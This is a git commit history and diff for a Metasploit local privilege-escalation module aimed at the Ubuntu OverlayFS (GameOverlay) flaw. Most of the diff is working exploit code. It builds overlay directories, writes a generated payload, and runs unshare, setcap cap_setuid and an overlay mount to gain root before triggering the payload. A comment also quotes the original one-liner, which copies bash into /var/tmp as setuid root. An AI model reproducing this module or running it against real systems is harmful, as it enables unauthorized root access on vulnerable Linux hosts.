Rebase and maintain authorship

Rebase and change payload delivery

Rebase and remove cmdstager
Update modules/exploits/linux/local/game_overlay_privesc.rb

Co-authored-by: jheysel-r7 <[email protected]>

remove CmdStager Mixin

Add PrependSetuid

Remove python from exploit

Remove generate_payload_exe and add dynamic directory to upper mount layer

Change where payload is dropped

Remove FileUtils module

Call proper method for generating payload

Seperate exploit and triggering of payload

Seperate exploit and triggering payload

test

Author: gardnerapp

modules/exploits/linux/local/gameoverlay_privesc.rb

@@ -5,15 +5,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
   include Msf::Exploit::FileDropper
-  include Msf::Exploit::CmdStager
-  include FileUtils
 
-  # TODO 
-  # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions
-  # ^ What does the output change to 
-  #
-  # 4) Make exploit more readable with multiline string, change exploit to use 
-  # todo add python requirement
 
   def initialize(info = {})
     super(
@@ -50,12 +42,14 @@ def initialize(info = {})
         ],
         'Targets' => [ [ 'Linux', {} ] ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'CmdStagerFlavor' => 'bourne'
+        'DefaultOptions' => { 
+          'PrependSetuid' => true,
+        }
       )
     )
     register_options [
       OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
-      OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv'])
+      OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']),
     ]
   end
 
@@ -103,61 +97,48 @@ def check
     return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
   end
 
-  def execute_command(_cmd, _opts = {})
+  def exploit
     pay_file = datastore['PayloadFilename']
 
     pay_dir = datastore['WritableDir']
     pay_dir += "/" unless pay_dir.ends_with? "/"
     pay_dir += Rex::Text.rand_text_alpha 10
 
-    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    print_status "Creating directory to store payload: #{pay_dir}"
+    mkdir pay_dir
 
-    # Should we make sure directory doesn't already exist?
+    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
 
     directories.each do |dir|
       print_status "Creating directory #{dir}"
-      mkdir dir
+      mkdir "#{dir}"
     end
 
-    register_dir_for_cleanup pay_dir
-
-    print_status "Creating directory to store payload: #{pay_dir}"
-    pay_dir.concat "/" unless pay_dir.ends_with? "/"
-    cmd_exec "mkdir -p #{pay_dir}"
-
-    register_dir_for_cleanup pay_dir
-
     pay = "#{pay_dir}#{pay_file}"
 
     print_status "Writing payload: #{pay}"
 
-    write_file "#{pay}", generate_payload_exe
-    # works move test to low, run unshare mount set cap, shell
+    write_file pay, generate_payload.generate
 
     print_status 'Starting new namespace, and running exploit...'
 
     # g1vi original
     # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
 
-    # TODO move running of payload and exploit to different cmd_exec calls
-    hack =  <<-TEXT
-    unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
-        setcap cap_setuid+eip #{pay_dir}l/python3; 
-        mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m 
-        && touch /tmp/main/m/* 
-      \" 
-     && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")'
-    TEXT
-
-    print_status "Running exploit:\n '#{hack}'\n "
-    print_status(cmd_exec_with_result(hack))
-  end
+    # Exploit overlayfs vuln
+    hack =  "unshare -rm sh -c \" cd #{pay_dir} && cp #{pay} l/; setcap cap_setuid+eip l/#{pay_file}; 
+    mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*\""
+    
 
-  def exploit
-    puts "System Info: #{get_sysinfo}"
-    execute_cmdstager
+    print_status "Running exploit:\n'#{hack}'\n"
+    print_status(cmd_exec_with_result(hack).to_s)
+
+    # Trigger payload
+    trigger = "cp #{pay_dir}u/#{pay_file} /home/ubuntu/test_payload; chmod +x #{pay_dir}u/#{pay_file} && #{pay_dir}u/#{pay_file}"
 
-    # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"}
+    print_status "Triggering payload: #{trigger}"
+    print_status(cmd_exec_with_result(trigger).to_s)
   end
 
 end